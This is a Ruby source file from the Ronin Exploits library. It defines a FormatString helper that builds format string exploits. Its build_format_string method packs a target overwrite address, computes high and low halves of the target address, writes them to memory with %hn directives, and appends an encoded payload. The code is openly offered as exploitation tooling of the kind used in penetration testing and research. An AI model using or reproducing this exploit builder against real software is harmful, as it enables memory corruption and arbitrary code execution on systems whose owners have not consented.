#
#--
# Ronin Exploits - A Ruby library for Ronin that provides exploitation and
# payload crafting functionality.
#
# Copyright (c) 2007-2009 Hal Brodigan (postmodern.mod3 at gmail.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
#++
#

require 'ronin/exploits/targets/format_string'
require 'ronin/exploits/helpers/binary'

module Ronin
  module Exploits
    module Helpers
      module FormatString
        def self.included(base)
          base.module_eval do
            include Ronin::Exploits::Helpers::Binary

            has n, :targets,
                   :class_name => 'Ronin::Exploits::Targets::FormatString'

            # The built format string
            attr_reader :format_string
          end
        end

        def self.extended(obj)
          obj.instance_eval do
            extend Ronin::Exploits::Helpers::Binary

            #
            # Returns the format string of the exploit.
            #
            def format_string
              @format_string
            end
          end
        end

        #
        # Adds a new Targets::FormatString with the given _attributes_
        # and _block_.
        #
        def targeting(attributes={},&block)
          self.targets << Targets::FormatString.new(attributes,&block)
        end

        protected

        #
        # Builds a format string using the current target and payload to
        # be used in the format string exploit.
        #
        def build_format_string
          verify_target!

          buffer = pack(target.overwrite) + 
                   pack(target.overwrite + (target.arch.address_length / 2))

          low_mask = 0xff
          (target.arch.address_length/2).times do
            low_mask <<= 8
            low_mask |= 0xff
          end

          high_mask = low_mask << (target.arch.address_length*4)
          high = (target.address & high_mask) >> (target.arch.address_length/2)
          low = target.address & low_mask

          if low < high
            low -= (target.arch.address_length*2)
            buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",low,target.pop_length,high-low,target.pop_length+1)
          else
            high -= (target.arch.address_length*2)
            buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",high,target.pop_length+1,low-high,target.pop_length)
          end

          buffer << encoded_payload
          return buffer
        end

        #
        # The default builder method, simply calls build_format_string.
        #
        def build
          @format_string = build_format_string
        end
      end
    end
  end
end